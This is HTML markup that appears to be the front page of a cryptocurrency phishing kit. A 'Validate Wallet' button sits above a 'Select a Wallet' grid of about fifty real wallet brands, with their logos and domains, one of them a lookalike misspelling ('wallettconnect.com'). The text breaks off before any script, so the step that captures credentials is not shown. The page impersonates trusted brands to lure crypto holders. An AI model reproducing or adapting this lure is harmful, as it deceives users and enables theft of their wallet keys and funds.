<!DOCTYPE html>
<html>

<!-- Designed by OriAde. Telegram: @Streetified99 -->
<head>

    <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
    <title>Wallets | Dapps Leading Synthetic Protocol</title>

    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

    <link rel="stylesheet" type="text/css" href="assets/css/style.css">

    <link rel="shortcut icon" href="assets/icon/Favicon.png">
    <link rel="apple-touch-icon-precomposed" href="assets/icon/Favicon.jpg">
</head>

<!-- <body class="body header-fixed is_dark"> -->
<body class="body header-fixed is_dark">

    <div class="preload preload-container">
        <div class="preload-logo"></div>
    </div>

    <div id="wrapper">
        <div id="page" class="clearfix">

            <header id="header_main" class="header_1 js-header">
                <div class="themesflat-container">
                    <div class="row">
                        <div class="col-md-12">
                            <div id="site-header-inner">
                                <div class="wrap-box flex">
                                    <div id="site-logo" class="clearfix">
                                        <div id="site-logo-inner">
                                            <a href="index.html" rel="home" class="main-logo">
                                                <h3 style="color: blue !important;">Dapps Integration</h3>
                                            </a>
                                        </div>
                                    </div>
                                    
                                    <div class="flat-search-btn flex">
                                        <div class="sc-btn-top mg-r-12" id="site-header">
                                            <a href="index.html" id="connectbtn" class="sc-button header-slider style style-1 wallet fl-button pri-1">
                                                <span>Validate Wallet</span>
                                            </a>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                
            </header>


    

            <section class="tf-section top-seller" id="wallets_list">
                <div class="themesflat-container">
                    <div class="row">
                        <div class="col-md-12">
                            <h2 class="tf-title style2">
                                Select a Wallet</h2>
                            <div class="heading-line s2"></div>
                        </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="wallet_connect" class="sc-author-box select_wallet" data-title="safepal" data-logo="./assets/images/logo/safepal.png" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/safepal.png" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Safepal</a></h5>
                                        <span class="price">safepal.com</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="wallet_connect" class="sc-author-box select_wallet" data-title="Wallet Connect" data-logo="./assets/images/logo/walle.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/walle.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Wallet Connect</a></h5>
                                        <span class="price">wallettconnect.com</span>
                                    </div>
                                </div>
                            </div>

                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="trust_wallet" class="sc-author-box select_wallet" data-title="Trust Wallet" data-logo="./assets/images/logo/trust_wallet.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/trust_wallet.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Trust Wallet</a></h5>
                                        <span class="price">trustwallet.com</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="metamask" class="sc-author-box select_wallet" data-title="Metamask" data-logo="./assets/images/logo/metamask.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/metamask.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Metamask</a></h5>
                                        <span class="price">metamask.io</span>
                                    </div>
                                </div>
                            </div>

                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="liquality" class="sc-author-box select_liquality" data-title="Liquality" data-logo="./assets/images/logo/liquality.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/liquality.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Liquality</a></h5>
                                        <span class="price">liquality.com</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="Phantom" class="sc-author-box select_wallet" data-title="Phantom" data-logo="./assets/images/logo/phantom.svg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/phantom.svg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Phantom</a></h5>
                                        <span class="price">phantom.app</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="binance" class="sc-author-box select_wallet" data-title="Binance Chain Wallet" data-logo="./assets/images/logo/binance.png" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/binance.png" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Binance Chain Wallet</a></h5>
                                        <span class="price">binance.com</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="polygon" class="sc-author-box select_wallet" data-title="Polygon Wallet" data-logo="./assets/images/logo/polygon.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/polygon.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Polygon Wallet</a></h5>
                                        <span class="price">polygon.technology</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="rainbow" class="sc-author-box select_wallet" data-title="Rainbow" data-logo="./assets/images/logo/rainbow.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/rainbow.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Rainbow</a></h5>
                                        <span class="price">rainbow.me</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="bitpay" class="sc-author-box select_wallet" data-title="Bitpay" data-logo="./assets/images/logo/bitpay.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/bitpay.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Bitpay</a></h5>
                                        <span class="price">bitpay.com</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="waleth" class="sc-author-box select_wallet" data-title="Walleth" data-logo="./assets/images/logo/walleth.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/walleth.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Walleth</a></h5>
                                        <span class="price">walleth.org</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="argent" class="sc-author-box select_wallet" data-title="Argent" data-logo="./assets/images/logo/argent.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/argent.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Argent</a></h5>
                                        <span class="price">argent.xyz</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="argent" class="sc-author-box select_wallet" data-title="Solflare" data-logo="./assets/images/logo/solflare.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/solflare.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Solflare</a></h5>
                                        <span class="price">solflare.com</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="huobi" class="sc-author-box select_wallet" data-title="Huobi Wallet" data-logo="./assets/images/logo/huobi.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/huobi.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Huobi Wallet</a></h5>
                                        <span class="price">huobiwallet.com</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="encrypted_ink" class="sc-author-box select_wallet" data-title="Encrypted Ink" data-logo="./assets/images/logo/encrypted_ink.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/encrypted_ink.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Encrypted Ink</a></h5>
                                        <span class="price">encrypted.ink</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="compound" class="sc-author-box select_wallet" data-title="Compound" data-logo="./assets/images/logo/compound.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/compound.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Compound</a></h5>
                                        <span class="price">compound.finance</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="polkadot" class="sc-author-box select_wallet" data-title="Polkadot" data-logo="./assets/images/logo/polkadot.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/polkadot.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Polkadot</a></h5>
                                        <span class="price">polkadot.network</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="iotex" class="sc-author-box select_wallet" data-title="Iotex" data-logo="./assets/images/logo/iotex.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/iotex.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Iotex</a></h5>
                                        <span class="price">iotex.io</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="coin98" class="sc-author-box select_wallet" data-title="Coin98" data-logo="./assets/images/logo/coin98.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/coin98.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Coin98</a></h5>
                                        <span class="price">coin98.com</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="coinbase" class="sc-author-box select_wallet" data-title="Coinbase" data-logo="./assets/images/logo/coinbase.png" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/coinbase.png" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Coinbase</a></h5>
                                        <span class="price">coinbase.com</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="crypto" class="sc-author-box select_wallet" data-title="Crypto.com | Defi Wallet" data-logo="./assets/images/logo/crypto.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/crypto.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Crypto.com | Defi Wallet</a></h5>
                                        <span class="price">crypto.com</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="token_pocket" class="sc-author-box select_wallet" data-title="Token Pocket" data-logo="./assets/images/logo/token_pocket.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/token_pocket.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Token Pocket</a></h5>
                                        <span class="price">tokenpocket.pro</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="math_wallet" class="sc-author-box select_wallet" data-title="Math Wallet" data-logo="./assets/images/logo/math_wallet.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/math_wallet.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Math Wallet</a></h5>
                                        <span class="price">mathwallet.org</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="ledger_live" class="sc-author-box select_wallet" data-title="Ledger Live" data-logo="./assets/images/logo/ledger_live.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/ledger_live.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Ledger Live</a></h5>
                                        <span class="price">ledger.com</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="_1inch" class="sc-author-box select_wallet" data-title="1Inch" data-logo="./assets/images/logo/1inch.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/1inch.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>1Inch</a></h5>
                                        <span class="price">1inch.io</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="dharma" class="sc-author-box select_wallet" data-title="Dharma" data-logo="./assets/images/logo/dharma.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/dharma.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Dharma</a></h5>
                                        <span class="price">dharma.io</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="trust_vault" class="sc-author-box select_wallet" data-title="Trust Vault" data-logo="./assets/images/logo/trust_vault.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/trust_vault.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Trust Vault</a></h5>
                                        <span class="price">trustology.io</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="my_key" class="sc-author-box select_wallet" data-title="MYKEY" data-logo="./assets/images/logo/mykey.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/mykey.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>MYKEY</a></h5>
                                        <span class="price">mykey.org</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="atomic" class="sc-author-box select_wallet" data-title="Atomic" data-logo="./assets/images/logo/atomic.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/atomic.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Atomic</a></h5>
                                        <span class="price">atomicwallet.io</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="cool_wallet_s" class="sc-author-box select_wallet" data-title="CoolWallet S" data-logo="./assets/images/logo/cool_wallet_s.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/cool_wallet_s.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>CoolWallet S</a></h5>
                                        <span class="price">coolwallet.io</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="nash" class="sc-author-box select_wallet" data-title="Nash" data-logo="./assets/images/logo/nash.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/nash.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Nash</a></h5>
                                        <span class="price">nash.io</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="coinomi" class="sc-author-box select_wallet" data-title="Coinomi" data-logo="./assets/images/logo/coinomi.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/coinomi.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Coinomi</a></h5>
                                        <span class="price">coinomi.com</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="gridplus" class="sc-author-box select_wallet" data-title="GridPlus" data-logo="./assets/images/logo/gridplus.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/gridplus.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>GridPlus</a></h5>
                                        <span class="price">gridplus.io</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="tokenary" class="sc-author-box select_wallet" data-title="Tokenary" data-logo="./assets/images/logo/tokenary.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/tokenary.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Tokenary</a></h5>
                                        <span class="price">tokenary.io</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="safepal" class="sc-author-box select_wallet" data-title="SafePal" data-logo="./assets/images/logo/safepal.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/safepal.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>SafePal</a></h5>
                                        <span class="price">safepal.io</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="infinito" class="sc-author-box select_wallet" data-title="Infinito" data-logo="./assets/images/logo/infinito.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/infinito.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Infinito</a></h5>
                                        <span class="price">infinitowallet.io</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="wallet_io" class="sc-author-box select_wallet" data-title="Wallet.io" data-logo="./assets/images/logo/wallet_io.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/wallet_io.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Wallet.io</a></h5>
                                        <span class="price">wallet.io</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="ownbit" class="sc-author-box select_wallet" data-title="Ownbit" data-logo="./assets/images/logo/ownbit.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/ownbit.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Ownbit</a></h5>
                                        <span class="price">ownbit.io</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="easypocket" class="sc-author-box select_wallet" data-title="EasyPocket" data-logo="./assets/images/logo/easypocket.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/easypocket.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>EasyPocket</a></h5>
                                        <span class="price">easypocket.app</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="bridget_wallet" class="sc-author-box select_wallet" data-title="Bridge Wallet" data-logo="./assets/images/logo/bridge_wallet.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/bridge_wallet.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Bridge Wallet</a></h5>
                                        <span class="price">mtpelerin.com</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="via_wallet" class="sc-author-box select_wallet" data-title="ViaWallet" data-logo="./assets/images/logo/via_wallet.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/via_wallet.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>ViaWallet</a></h5>
                                        <span class="price">viawallet.com</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="bitkeep" class="sc-author-box select_wallet" data-title="BitKeep" data-logo="./assets/images/logo/bitkeep.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/bitkeep.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>BitKeep</a></h5>
                                        <span class="price">bitkeep.com</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="unstoppable_wallet" class="sc-author-box select_wallet" data-title="Unstoppable Wallet" data-logo="./assets/images/logo/unstoppable_wallet.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/unstoppable_wallet.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Unstoppable Wallet</a></h5>
                                        <span class="price">unstoppable.money</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="halodefi_wallet" class="sc-author-box select_wallet" data-title="HaloDefi Wallet" data-logo="./assets/images/logo/halodefi_wallet.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/halodefi_wallet.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>HaloDefi Wallet</a></h5>
                                        <span class="price">halodefi.org</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="dok_wallet" class="sc-author-box select_wallet" data-title="Dok Wallet" data-logo="./assets/images/logo/dok_wallet.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/dok_wallet.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Dok Wallet</a></h5>
                                        <span class="price">dokwallet.com</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="celo_wallet" class="sc-author-box select_wallet" data-title="Cello Wallet" data-logo="./assets/images/logo/celo_wallet.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/celo_wallet.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Cello Wallet</a></h5>
                                        <span class="price">cellowallet.app</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="coinus" class="sc-author-box select_wallet" data-title="CoinUs" data-logo="./assets/images/logo/coinus.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/coinus.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>CoinUs</a></h5>
                                        <span class="price">coinus.io</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="valora" class="sc-author-box select_wallet" data-title="Valora" data-logo="./assets/images/logo/valora.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/valora.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Valora</a></h5>
                                        <span class="price">valoraapp.com</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="trustee_wallet" class="sc-author-box select_wallet" data-title="Trustee Wallet" data-logo="./assets/images/logo/trustee_wallet.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/trustee_wallet.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Trustee Wallet</a></h5>
                                        <span class="price">trusteeglobal.com</span>
                                    </div>
                                </div>
                            </div>


                            <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                                <div id="guarda_wallet" class="sc-author-box select_wallet" data-title="Gaurda Wallet" data-logo="./assets/images/logo/guarda_wallet.jpg" style="cursor:pointer;">
                                    <div class="author-avatar">
                                        <a href="#">
                                            <img src="assets/images/logo/guarda_wallet.jpg" alt="Image" class="avatar">
                                        </a>
                                        <div class="badge"><i class="ripple"></i></div>
                                    </div>
                                    <div class="author-infor">
                                        <h5 class="style2"><a>Gaurda Wallet</a></h5>
                                        <span class="price">guarda.com</span>
                                    </div>
                                </div>
                            </div>


